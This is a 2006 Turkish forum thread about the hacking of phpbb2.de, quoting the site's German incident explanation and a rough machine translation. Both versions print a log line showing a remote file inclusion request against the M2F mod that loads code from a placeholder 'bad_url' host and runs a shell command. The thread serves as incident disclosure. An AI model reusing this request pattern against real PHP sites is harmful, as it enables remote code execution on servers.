phpbb2.de hacklendi

phpBB destek veya chat forumu değildir
phpBB ile ilgili sorulan tüm soru başlıkları kilitlenecek veya silinecektir.
Bu forumda phpBB sorunları dışındaki genel Webmaster sorunlarını ve problemlerini tartışabilirsiniz.
Forum kuralları
- Yeni bir başlık açarken lütfen konu başlığına "Acil yardım", "Acele yardım" tarzlarında içerisinde "yardım" kelimesi geçen cümleler yazmayınız. Bu tip başlıklara kesinlikle cevap verilmeyecektir. Lütfen konu başlığına içeriği en iyi özetleyen anlaşılabilir bir cümle yazınız.

- Ayrıca yeni başlıklarınızı kesinlikle ilgili forumlara açınız. Örneğin, phpBB3 kurulum ve çalıştırması hakkında bir sorununuz varsa "3.0.x Destek Forumu" forumuna başlık açınız; phpBB3 temasından kaynaklı bir sorunuz varsa "3.0.x Stil/Tema Geliştirme & Tartışma & Yardım" forumuna başlık açınız; phpBB3 mod/eklentileriyle ilgili sorununuz varsa "3.0.x MOD Destek" forumuna başlık açınız. Bu kurala uymayan kullanıcıların başlıkları silinebilir ve kullanıcı uyarı alabilir ya da süresiz uzaklaştırılabilir.

- Site kurallarımızı okumadan kesinlikle forumlarımıza herhangi bir katılım yapmayınız.
Cevapla
Kullanıcı avatarı
cupra
Kayıtlı Kullanıcı
Mesajlar: 2505
Kayıt: 01.04.2006, 02:33
Konum: smyrna
İletişim:

phpbb2.de hacklendi

Mesaj gönderen cupra »

arkadaşlar phpbb2.de sitesi hacklenmiş .
[ resmi görüntülemek için tıklayın ]
Kullanıcı avatarı
LeBron
Kayıtlı Kullanıcı
Mesajlar: 519
Kayıt: 17.01.2006, 12:22
İletişim:

Mesaj gönderen LeBron »

index hala duruyor.Şaşırdım doğrusu :shock:
Kullanıcı avatarı
cupra
Kayıtlı Kullanıcı
Mesajlar: 2505
Kayıt: 01.04.2006, 02:33
Konum: smyrna
İletişim:

Mesaj gönderen cupra »

kesin olayı çözecekler, inceleme yapıyorlar uzun sürdü.
phpbb hack sanırım hataya baksanıza. :?
zuper
Kayıtlı Kullanıcı
Mesajlar: 132
Kayıt: 12.04.2006, 16:07

Mesaj gönderen zuper »

aman bu ne ki bizim Turk Hackerler Geçen Gün Microsoft u Hacklediler
artık güvenlik diye bi şey kalmadı.hatta 1.5 sene önce phpbb com da hacklenmişti phpbb2 de hacklendi biz nasıl güvenlik sağlayacağız onu düşünüyom.

Allah Hepimizin Yardımcısı Olsun.
Kullanıcı avatarı
cupra
Kayıtlı Kullanıcı
Mesajlar: 2505
Kayıt: 01.04.2006, 02:33
Konum: smyrna
İletişim:

Mesaj gönderen cupra »

siteyi çalıştırdılar.
almancası olan varsa açıklayabilir detayları
Hier schonmal eine kurze Erklärung was passiert ist, wieso phpBB2.de gehackt wurde.

Wir hatten vor Jahren mal das Modul M2F getestet (Mail2Forum) welches seinerzeit von Netclectic programmiert wurde, haben es aber nie aktiv eingesetzt, dummerweise existierte der Ordner noch auf dem Webspace. Eine nun neu aufgetauchtes Sicherheitsleck in diesem Mod führte nun dazu, das phpBB2.de über diese Lücke gehackt wurde. Im Log-File sieht das beispielsweise so aus:

Kod: Tümünü seç


196.xxx.xx.x - - [18/Jul/2006:05:52:35 +0200] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://www.bad_url_here.com/badfile.txt?/cmd.txt?&cmd=ls HTTP/1.1" 200 4431 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Diese Lücke ist nicht im Standard phpBB2 oder phpBB2 Plus enthalten, da in diesen Version kein M2F Mod verwendet wird.

Wir werden nun die Logfiles genau auswerten, jedoch ist sicher, das genau diese Sicherheitslücke ausgenutzt wurde, und dies kein generelles Sicherheitsleck in phpBB2 darstellt ! Daher empfehlen wir allen Usern von M2F, zumindest temporär dieses Modul komplett zu deinstallieren bis die Lücke in einer neuen Version geschlossen wurde !
sabri ünal
Kayıtlı Kullanıcı
Mesajlar: 137
Kayıt: 09.05.2006, 12:22
İletişim:

Mesaj gönderen sabri ünal »

Here already times a short explanation which passed, why phpBB2.de was chopped.

We years ago times the module M2F had tested (Mail2Forum) which by Netclectic were at that time programmed, to have it stupid-proved however never actively assigned, existed the file still on the Web space. Now safety leakage in this Mod, emerged again, led now to it, the phpBB2.de across this gap was chopped. In the log file looks for example in such a way:

Kod: Tümünü seç

 196.xxx.xx.x -- [18/Jul/2006: 05: 52: 35 +0200] “GET /m2f/m2f_phpbb204.php? m2f_root_path= http://www.bad_url_here.com/badfile.txt?/cmd.txt?&cmd=ls HTTP/1.1” 200 4431” - ““Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5,1)” 

This gap is not contained in the standard phpBB2 or phpBB2 plus, since into this version no M2F Mod is used.

We will exactly evaluate now the log files, however is safe, which were used exactly this safety gap, and this no general safety leakage in phpBB2 represents! Therefore we recommend all Usern of M2F, at least temporarly this module completely to deinstallieren to the gap in a new version were closed!
Kullanıcı avatarı
GodBeach
Uzaklaştırıldı
Mesajlar: 734
Kayıt: 05.05.2006, 23:12
Konum: Güngören, İSTANBUL
İletişim:

Mesaj gönderen GodBeach »

:o Laf ...
Bir php kodu
$GodBeach = "Php Script Yazılır";

print $GodBeach;

Önizleme: Php Script Yazılır
zdearban
Kayıtlı Kullanıcı
Mesajlar: 1
Kayıt: 19.07.2006, 04:59
İletişim:

Mesaj gönderen zdearban »

ilginç
Kullanıcı avatarı
Mirach
Destek Ekibi Lideri
Destek Ekibi Lideri
Mesajlar: 1664
Kayıt: 27.03.2006, 01:06
Konum: İstanbul

Mesaj gönderen Mirach »

pfs , bide mail vermiş 8)
Kullanıcı avatarı
cupra
Kayıtlı Kullanıcı
Mesajlar: 2505
Kayıt: 01.04.2006, 02:33
Konum: smyrna
İletişim:

Mesaj gönderen cupra »

söylediklerine göre phpbb plus ile birlikte kullandıkları bir sayfadaki script yüzünden bir açık oluşmuş ve bu açık yüzünden hacklenmiş, plus direkt olarak hacklenmemiş demeye getirmiş..
sabri ünal
Kayıtlı Kullanıcı
Mesajlar: 137
Kayıt: 09.05.2006, 12:22
İletişim:

Mesaj gönderen sabri ünal »

yav abim inanmamış gibi konuşuyorsunuz niye? adam ordan hacklemişse ordan hacklemiştir :)
Cevapla

“Genel Tartışmalar” sayfasına dön

Kimler çevrimiçi

Bu forumu görüntüleyen kullanıcılar: Hiç bir kayıtlı kullanıcı yok ve 11 misafir